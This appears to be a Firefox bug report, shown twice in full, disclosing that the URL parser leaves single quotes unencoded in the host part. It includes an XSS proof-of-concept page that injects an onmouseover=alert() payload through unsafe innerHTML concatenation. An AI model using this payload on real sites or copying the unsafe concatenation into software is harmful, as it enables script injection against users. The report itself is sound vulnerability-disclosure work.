BUG
============
Improper validation of url cause major security issue
TESTED VERSION
===============
tested in FIREFOX browser windows and Linux 118.0.1
DETAILS
===============
Firefox has built-in url parser "new URL" .
But it does not properly escape/encode single-qoute(') from url host part . So, this cause various secuirty vulnerability
try bellow command and see the result
```
new URL("http://example.com'/")
```
result
```
URL { href: "http://example.com'/", origin: "http://example.com'", protocol: "http:", username: "", password: "", host: "example.com'", hostname: "example.com'", port: "", pathname: "/", search: "" }
```
here see provided malicious url is http://example.com'/ and new URL() does not escape/encode single-qoutes(') from this url href,hostname,origin part
**here i found rfc . Host can only contain dot,alphanumeric and "-" .
https://www.rfc-editor.org/rfc/rfc3986.html Page-20
https://datatracker.ietf.org/doc/html/rfc1738 page 5
````
defined in Section 3.5 of [RFC1034] and Section 2.1 of [RFC1123].
Such a name consists of a sequence of domain labels separated by ".",
each domain label starting and ending with an alphanumeric character
and possibly also containing "-" characters. The rightmost domain
label of a fully qualified domain name in DNS may be followed by a
single "." and should be if it is necessary to distinguish between
the complete domain name and some local domain.
```
**i just checked all the modern browser like chrome, microsoft edge,opera,brave-browser,vivaldi,safari,yandex properly filter this payload .
they urlencode the single-quotes(') present in host part .
But it only exception for firefox browser .
here is sample code to make xss attack
```
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
<style>
</style>
</head>
<body>
<div id=aaa>
</div>
<script>
var u=new URL("http://example.com'/onmouseover=alert();//")
hh="<a href='"+u.href+"'>sddsf</a>"
document.getElementById("aaa").innerHTML=hh
</script>
</body>
</html>
```
host this page and open this page in browser and mouseover over the url to execute xss .
This is happening only becauses of single-quotes present in host part . this single-quote(') breaks the html context .
You should also urlencode the single-quote character present in host part just like all the other modern web-browser did .
Bug 1858119 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
BUG
============
Improper validation of url cause major security issue
TESTED VERSION
===============
tested in FIREFOX browser windows and Linux 118.0.1
DETAILS
===============
Firefox has built-in url parser "new URL" .
But it does not properly escape/encode single-qoute(') from url host part . So, this cause various secuirty vulnerability
try bellow command and see the result
```
new URL("http://example.com'/")
```
result
```
URL { href: "http://example.com'/", origin: "http://example.com'", protocol: "http:", username: "", password: "", host: "example.com'", hostname: "example.com'", port: "", pathname: "/", search: "" }
```
here see provided malicious url is http://example.com'/ and new URL() does not escape/encode single-qoutes(') from this url href,hostname,origin part
**here i found rfc . Host can only contain dot,alphanumeric and "-" .
https://www.rfc-editor.org/rfc/rfc3986.html Page-20
https://datatracker.ietf.org/doc/html/rfc1738 page 5
```
defined in Section 3.5 of [RFC1034] and Section 2.1 of [RFC1123].
Such a name consists of a sequence of domain labels separated by ".",
each domain label starting and ending with an alphanumeric character
and possibly also containing "-" characters. The rightmost domain
label of a fully qualified domain name in DNS may be followed by a
single "." and should be if it is necessary to distinguish between
the complete domain name and some local domain.
```
**i just checked all the modern browser like chrome, microsoft edge,opera,brave-browser,vivaldi,safari,yandex properly filter this payload .
they urlencode the single-quotes(') present in host part .
But it only exception for firefox browser .
here is sample code to make xss attack
```
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
<style>
</style>
</head>
<body>
<div id=aaa>
</div>
<script>
var u=new URL("http://example.com'/onmouseover=alert();//")
hh="<a href='"+u.href+"'>sddsf</a>"
document.getElementById("aaa").innerHTML=hh
</script>
</body>
</html>
```
host this page and open this page in browser and mouseover over the url to execute xss .
This is happening only becauses of single-quotes present in host part . this single-quote(') breaks the html context .
You should also urlencode the single-quote character present in host part just like all the other modern web-browser did .